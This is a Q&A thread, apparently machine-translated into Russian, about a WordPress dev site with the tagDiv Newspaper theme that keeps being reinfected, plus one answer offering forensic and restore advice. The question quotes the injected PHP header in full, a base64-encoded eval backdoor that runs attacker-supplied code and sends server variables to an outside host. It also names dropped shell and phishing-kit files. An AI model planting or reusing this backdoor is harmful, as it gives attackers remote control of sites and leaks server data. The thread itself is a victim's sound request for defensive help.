Защищенный паролем сайт WordPress с темой tagDiv Newspaper заражен вредоносным ПО

Question

Я работаю над сайтом WordPress, который заражается вредоносными программами каждые x недель, но мы не можем найти причину проблемы. Немного справочной информации:

Сайт находится в отдельном домене разработки, защищенном паролем. Во время разработки мы обновляли программное обеспечение, когда обновления были доступны. Случается так, что через случайное количество недель мы перенаправляемся на спам-сайты, когда пытаемся получить доступ к сайту. Сам сайт становится очень медленным при первом посещении, после чего скорость снова становится разумной. У нас есть только 1 учетная запись администратора и несколько редакторов, работающих на веб-сайте для передачи контента. Таким образом, только несколько доверенных лиц имеют доступ к сайту.

Наша хостинговая компания проверяет / сканирует на наличие вредоносных программ, но, похоже, слишком поздно, чтобы предотвратить причину.

У нас есть только несколько установленных плагинов, которые кажутся git. Список ниже:

• Classi c Editor
• Разборные категории на панели инструментов (этот плагин не используется многими, поэтому может представлять опасность?)
• Гутенберг
• Сетка оправданных изображений
• Отображение идентификаторов
• Облачная библиотека tagDiv
• tagDiv Composer
• tagDiv Social Counter
• tagDiv Standard Pack
• Wordpress Importer
• Yoast SEO

Все плагины и сам WordPress постоянно обновляются до последней доступной версии.

Мы установили тему tagDiv Newspaper версии 10.0, но также имели проблемы с предыдущими версиями. При каждой переустановке сайта WordPress мы удаляли все файлы и всю базу данных И просили хостинговую компанию дважды проверять пропущенные нами файлы. У нас есть другие сайты, работающие на том же сервере без каких-либо проблем, поэтому проблема, похоже, ограничивается сайтом dev / wordpress. Во время каждой очистки мы сбрасывали все соответствующие пароли (база данных, ftp). tagDiv Газетные темы, как представляется, неоднократно становились мишенью для внедрения вредоносных программ, поэтому это красный флаг. К сожалению, уже проделана большая работа, чтобы сменить тему было бы проблематично c, плюс я не 100%, это тема, которая вызывает проблемы.

После заражения все *. php файлы имеют этот дополнительный php код в верхней части каждого. php file:

<?php /*8968665*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KCi8vaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIsIGZhbHNlICwkY29udGV4dF9qaGtiKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307CiB9CiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*8968665*/ ?><?php

Насколько я могу судить по базе данных кажется нетронутым.

На root веб-сайта каталог pl создается с именами файлов PayPAl2019.zip и множеством подпапок, которые, кажется, обрабатывают какие-то платежи. Ссылки на IP в файлах, которые я мог найти, указывают на ip: ^ 64.106.213. *, Которые принадлежат DataPipe, In c.

Файлы, созданные в root каталога WordPress: 588eqpn7. php, u9hwrd7d. php и shell. php. Этот последний файл распознается любым вирусом вируса как троянец: Trojan: Script / Casur.A! Cl.

Некоторые штампы с датами файлов тоже странные. Например, 2018, но сайт разработки не существовал тогда?

Я ограничил доступ sh s к серверу, но у меня нет разрешения на выполнение некоторых из необходимых команд, чтобы копать глубже.

У меня есть следующие вопросы:

1. Как узнать, что является причиной заражения этого сайта WordPress?
2. Как восстановить сайт, не теряя слишком много Работа? Так как это не помогло удалить все первые пару раз.

Answer 1

Трудно понять, что именно происходит из того, что вы говорите. В зависимости от защиты паролем и вашей настройки некоторые сценарии ios более вероятны, чем другие. Если вы используете, например, модуль аутентификации basi c из Apache, злоумышленникам придется обойти это или получить доступ другим способом (другим хостингом на той же машине, что может быть подсказкой для неправильной установки разрешений, или хостер был скомпрометировано и др. c.). Если есть защита паролем на уровне приложения (например, через WordPress), это может не помешать доступу к определенным уязвимым ресурсам.

Описанная вами «повторная инфекция» может быть связана с постоянным бэкдором ( или незащищенный уязвимый компонент), так что это тоже нелегко сказать.

Как правило, если бы я сделал forensi c анализ установки, я бы начал со случайно выбранных файлов и увидел, когда и с чем вид параметров они были доступны. Оттуда я получу подсказку о том, что сделали злоумышленники, и, возможно, получу приблизительное представление о сроках первоначального компромисса. Таким образом, было бы легко восстановить резервную копию без потери времени.

В таком сценарии имеет смысл a) восстановить инфраструктуру (или приложение в этом случае) или, если доступно, b ) восстановить из заведомо исправной резервной копии. Очень тревожно, сколько хостеров не имеют работающей или недостаточной резервной копии и сколько клиентов выбирают низкую цену за (данные) безопасность.

В безопасное время вы можете загрузить копию установки и быстро и быстро восстановить Грязная установка в отдельную папку, затем сопоставьте две папки друг с другом и найдите различия (они могут быть либо от злоумышленника, либо настроены / разработаны вручную) Это экономичный c вопрос о том, сколько времени вы хотите вложить, чтобы восстановить, сколько установки. Если вы потратили слишком мало времени и злоумышленники вернулись, вам не повезло.

... также делайте резервные копии.